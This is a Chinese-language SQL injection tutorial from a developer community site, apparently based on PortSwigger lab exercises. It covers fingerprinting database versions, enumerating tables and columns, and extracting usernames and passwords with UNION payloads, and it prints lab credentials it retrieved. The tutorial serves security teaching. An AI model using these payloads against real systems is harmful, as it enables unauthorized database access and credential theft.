备案控制台
开发者社区 数据库 文章 正文

sql注入详解-02

2022-12-13 110
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 前言在利用SQL注入漏洞时,通常需要收集数据库本身的一些信息。这包括数据库软件的类型和版本,以及数据库所包含的表和列的内容。

前言


在利用SQL注入漏洞时,通常需要收集数据库本身的一些信息。这包括数据库软件的类型和版本,以及数据库所包含的表和列的内容。


查询数据库类型和版本


不同的数据库提供了不同的查询其版本的方式。 您通常需要尝试不同的查询来查找有效的查询,从而可以确定数据库软件的类型和版本。

确定某些流行数据库类型的数据库版本的查询如下:

1.png

例如,您可以通过以下输入使用UNION攻击:

' UNION SELECT @@version--

这可能返回如下所示的输出,确认数据库是Microsoft SQL Server以及所使用的版本:

示例1

2.png

3.png

其实上图只要将from后面稍微改一改即可:

4.png5.png6.png

示例2

使用Burp Suite拦截和修改设置产品类别过滤器的请求。

确定查询返回的列数以及哪些列包含文本数据(具体操作详见上一篇)

验证查询返回两个列,它们都包含文本,在category参数中使用如下有效负载:'+UNION+SELECT+'abc','def'#使用以下有效负载来显示数据库版本:'+UNION+SELECT+@@version,+NULL#

7.png8.png9.png

列出数据库的内容

大多数数据库类型(Oracle除外)都有一组称为信息模式的视图,它们提供关于数据库的信息。

您可以查询information_schema.tables以列出数据库中的表:

SELECT * FROM information_schema.tables

这将返回如下输出:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
=====================================================
MyDatabase dbo Products BASE TABLE
MyDatabase dbo Users BASE TABLE
MyDatabase dbo Feedback BASE TABLE

此输出表明存在三个表,分别称为“产品”,“用户”和“反馈”。

然后,您可以查询information_schema.columns以列出各个表中的列:

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

这将返回如下输出:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE
=================================================================
MyDatabase dbo Users UserId int
MyDatabase dbo Users Username varchar
MyDatabase dbo Users Password varchar

示例:输出显示指定表中的列以及每列的数据类型

10.png11.png12.png13.png14.png15.png里面主要是划红线的地方;

再看下面一个payload:

'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_ihdmlc'--

16.png

'+UNION+SELECT+username_uwlfut,+password_efkeac+FROM+users_ihdmlc--

17.png18.png19.png

Oracle上的信息架构

在Oracle上,您可以通过稍有不同的查询获得相同的信息。

您可以通过查询all_tables列出表:

SELECT * FROM all_tables

您可以通过查询all_tab_columns列出列:

SELECT * FROM all_tab_columns WHERE table_name = 'USERS'

示例

'+UNION+SELECT+'abc','def'+FROM+DUAL--

20.png

'+UNION+SELECT+table_name,NULL+FROM+all_tables--

21.png22.png

'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_PQHJGZ'--

23.png

PASSWORD_AHCZXT
USERNAME_FWAHRU

24.png

'+UNION+SELECT+USERNAME_FWAHRU,PASSWORD_AHCZXT+FROM+USERS_PQHJGZ--

25.png26.png27.png

在单个列中检索多个值

在前面的示例中,假设查询仅返回单个列。

通过将值串联在一起,可以轻松地在单个列中同时检索多个值,理想情况下,还可以使用合适的分隔符来区分组合的值。 例如,在Oracle上,您可以提交输入:

' UNION SELECT username || '~' || password FROM users--

它使用双管道序列||,这是Oracle上的字符串连接操作符。注入的查询将用户名和密码字段的值连接在一起,以~字符分隔。例如,查询的结果将允许您读取所有的用户名和密码:

...
administrator~s3cure
wiener~peter
carlos~montoya
...

注意,不同的数据库使用不同的语法来执行字符串连接。有关更多细节,请参见SQL注入备忘单: https://portswigger.net/web-security/sql-injection/cheat-sheet

'+UNION+SELECT+NULL,'abc'--

示例

28.png29.png

'+UNION+SELECT+NULL,username||'~'||password+from+users--

30.png31.png

administrator~dqjdhb7q21vlpoqar7ze

32.png33.png

文章标签:
SQL
关系型数据库
数据安全/隐私保护
Oracle
安全
数据库
关键词:
SQL注入
richard1230
目录
相关文章
大数据文摘
|
12天前
|
SQL 关系型数据库 MySQL
怎么通过第三方库实现标准库`database/sql`的驱动注入?
在Go语言中,数据库驱动通过注入`database/sql`标准库实现,允许统一接口操作不同数据库。本文聚焦于`github.com/go-sql-driver/mysql`如何实现MySQL驱动。`database/sql`提供通用接口和驱动注册机制,全局变量管理驱动注册,`Register`函数负责添加驱动,而MySQL驱动在`init`函数中注册自身。通过这个机制,开发者能以一致的方式处理多种数据库。
大数据文摘
22 3
香甜可口草莓蛋糕
|
17天前
|
SQL 安全 关系型数据库
SQL 注入神器:SQLMap 简单使用
SQL 注入神器:SQLMap 简单使用
香甜可口草莓蛋糕
36 1
阿里云服务开发者
|
26天前
|
SQL 存储 Java
如何避免SQL注入攻击?
如何避免SQL注入攻击?
阿里云服务开发者
36 0
宁波阿成.
|
1月前
|
SQL 安全
jeecg-boot sql注入漏洞解决
jeecg-boot sql注入漏洞解决
宁波阿成.
108 0
喜欢猪猪
|
1天前
|
SQL 安全 Java
Spring Boot中的跨站点脚本攻击(XSS)与SQL注入防护
【6月更文挑战第15天】在现代Web应用程序开发中,安全性是一个至关重要的课题。跨站点脚本攻击(XSS)和SQL注入是最常见的两种攻击类型,它们可以严重威胁到应用程序的安全。
喜欢猪猪
6 0
1442834948473151
|
13天前
|
SQL 监控 安全
sql注入取数据库
SQL注入是一种攻击技术,用于在SQL查询中注入恶意代码,从而绕过安全措施,获取、修改或删除数据库中的数据。这种行为是非法的,并且严重违反了网络安全和隐私原则。我不能提供关于如何进行SQL注入的指导或
1442834948473151
15 2
joseph_
|
14天前
|
SQL 数据库 关系型数据库
【SQL注入】 注入神器sqlmap的使用
数据库 SQL注入漏洞 sqlmap
joseph_
51 2
香甜可口草莓蛋糕
|
17天前
|
SQL XML 安全
Pikachu SQL 注入通关解析
Pikachu SQL 注入通关解析
香甜可口草莓蛋糕
18 0
sunr0ng
|
17天前
|
SQL 安全 关系型数据库
SQL注入常用姿势
该内容介绍了SQL注入攻击和防御的一些基本概念,以及MySQL中的几个函数:`MID()`用于提取文本字段的字符,`LIMIT()`用于限制查询结果的数量,`COUNT()`计算元组数量。它还详细讲解了两种SQL注入方法:基于布尔盲注和基于时间盲注,包括如何猜解数据库、表和字段信息。此外,还提到了SQL注入工具Sqlmap的使用方法和一些绕过过滤策略。
sunr0ng
26 0
SQL注入常用姿势
香甜可口草莓蛋糕
|
17天前
|
SQL 机器学习/深度学习 人工智能
Web LLM 实验:利用 LLM API 实现 SQL 注入
Web LLM 实验:利用 LLM API 实现 SQL 注入
香甜可口草莓蛋糕
19 1

热门文章

最新文章

  • 1
    Spring Boot 集成 MyBatis和 SQL Server实践
  • 2
    查看Windows服务器安装了那些SQL Server组件
  • 3
    SQL Server-聚焦什么时候用OPTION(COMPILE)呢?
  • 4
    SQL Server 默认跟踪应用4 -- 检测日志文件自动增长
  • 5
    A rowset based on the SQL command was not returned by the OLE DB provider
  • 6
    SQL Server 创建性能基线
  • 7
    步步为营VS 2008 + .NET 3.5(11) - DLINQ(LINQ to SQL)之大数据量分页、延迟执行和日志记录
  • 8
    Sql Server 添加外部程序集基本操作
  • 9
    微软官方提供的用于监控MS SQL Server运行状况的工具及SQL语句
  • 10
    一条sql语句“导致”的数据库宕机问题及分析
  • 1
    数据分享|SQL Server、Visual Studio、tableau对信贷风险数据ETL分析、数据立方体构建可视化
    32
  • 2
    如何避免SQL注入?
    33
  • 3
    MySQL SQL error: #1271 - Illegal mix of collations for operation ‘UNION‘
    31
  • 4
    利用 SQL 注入提取数据方法总结
    16
  • 5
    SQL 注入神器:jSQL Injection 保姆级教程
    64
  • 6
    DataWorks产品使用合集之DataWorks中,填写ODPS SQL任务中的参数和分区信息如何解决
    36
  • 7
    DataWorks产品使用合集之在DataWorks的数据开发模式中,在presql和postsql中支持执行多条SQL语句如何解决
    61
  • 8
    30个业务场景的SQL优化
    46
  • 9
    【MySQL】:探秘主流关系型数据库管理系统及SQL语言
    70
  • 10
    MaxCompute产品使用合集之大数据计算MaxCompute即使用相同的SQL语句在DataWorks和Tunnel上执行,结果却不同,如何解决
    29

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server 2017
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili

    • 相关实验场景

    更多
  • PolarDB for AI:在数据库中通过SQL实现AI能力
  • 玩转MaxCompute SQL! 30分钟搞定数据分析挖掘
  • 使用SQL语句实现数据表管理
  • 使用SQL语句实现数据插入、修改和删除操作
  • 使用SQL语句实现数据查询操作
  • 使用SQL语句管理索引
    • 下一篇
    2024年阿里云免费云服务器及学生云服务器申请教程参考